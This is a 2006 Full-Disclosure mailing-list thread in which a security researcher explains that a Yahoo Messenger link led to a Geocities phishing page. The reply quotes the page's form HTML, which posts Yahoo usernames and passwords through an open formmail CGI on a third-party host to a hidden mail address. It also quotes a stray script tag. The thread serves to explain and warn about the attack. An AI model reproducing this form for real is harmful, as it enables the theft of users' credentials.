Thanks for the explanation, Nick. Was indeed helpful. I am sure changing
the passwords blunts the attack but it sure feels stupid!!
The phishing apart, how can a userid be spoofed on Yahoo Messenger? Is
this something trivial? I thought Yahoo fixed the issue with Y!Messenger
5.0.
Thanks,
- Siddhartha
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Nick
FitzGerald
Sent: Monday, August 14, 2006 6:01 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Yahoo/Geocities possible
exploit/vulnerability
Jain, Siddhartha wrote:
I was logged onto Yahoo Messenger (version 7.5 on WinXP SP2 Pro), when
I
got a message from a friend's ID:
P Bx (8/14/2006 4:25:50 PM): ---
www.geocities.com/now_thats_funny_210/
Clicking on the link took me to a page with the URL as above in the
address bar and yahoo/geocities page that asks for username and
password. On entering the username and password, the next page
displayed
was my photo album on yahoo but the URL in the address bar still
remained the same as above!!
D'oh -- you've been phished!
Double-D'oh -- you announced it on Full-Disclosure!!
The URL you were sent is a phishing page. The form submission code
looks like the following (brain-damaged smart HTML rendering MUAs may
start to suck about here -- if that's yours, get a better one):
legendLogin Form/legend
FORM METHOD=POST ACTION=http://www2.fiberbit.net/form/mailto.cgi;
ENCTYPE=x-www-form-urlencoded
INPUT TYPE=hidden NAME=Mail_From VALUE=Yahoo
INPUT TYPE=hidden NAME=Mail_To VALUE=[EMAIL PROTECTED]
INPUT TYPE=hidden NAME=Mail_Subject VALUE=Yahoo id
INPUT TYPE=hidden NAME=Next_Page
value=http://photos.yahoo.com/ph//my_photos;
[...]
Basically, your Yahoo ID and password were sent to an open formmail
CGI at fiberbit.net which sent those details (plus some other stuff
based on reverse DNS, etc of the apparent IP submitting the form) via
Email to [EMAIL PROTECTED] and then the form-processing CGI
redirected your browser to your real Yahoo! Photos page,
http://photos.yahoo.com/ph//my_photos. If it did this without
prompting you for login (as it did for me) I guess that means you had
an already active Yahoo! session in your browser.
Next thing I noticed that Yahoo Messenger had frozen.
My guess here is (thankfully I'm not a YIM expert) that YIM only allows
one login per ID and kicks _old_ ones when a new session is initiated
from an already active ID. Thus getting logged out of YIM would mean
that the bot picking up and processing [EMAIL PROTECTED]'s Emails
had logged into YIM, presumably to send messages like the one you got
to your whole contact list. Lather, rinse, repeat...
I changed my yahoo password and un-installed Yahoo Messenger.
Damage already done though, methinks. I mean, good for changing your
password, but as all I can see this doing for now is spimming that
link, the damage is done. Of course, changing your password means that
they cannot re-use your credentials in future, should they recorded
them for possible future use.
I suspect that this was also supposed to try to exploit some or other
recent-ish IE security vulnerability, but due to incompetence on the
part of the person setting it up, they fluffed this aspect of the
intended attack. I mean, WTF otherwise is the explanation of this
from the middle of the now_thats_funny_210 page?
script language='javascript'
src='http://127.0.0.1:1894/js.cgi?pcawr=4886'/script
When I asked my friend about the message, he said he didn't send the
message but received a similar message from his wife in the morning
who
hadn't sent it either.
They've both already been hit -- be nice and strongly commend them to
change their passwords and then trace it back from his wife to whoever
she got it from, et seq...
Regards,
Nick FitzGerald
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
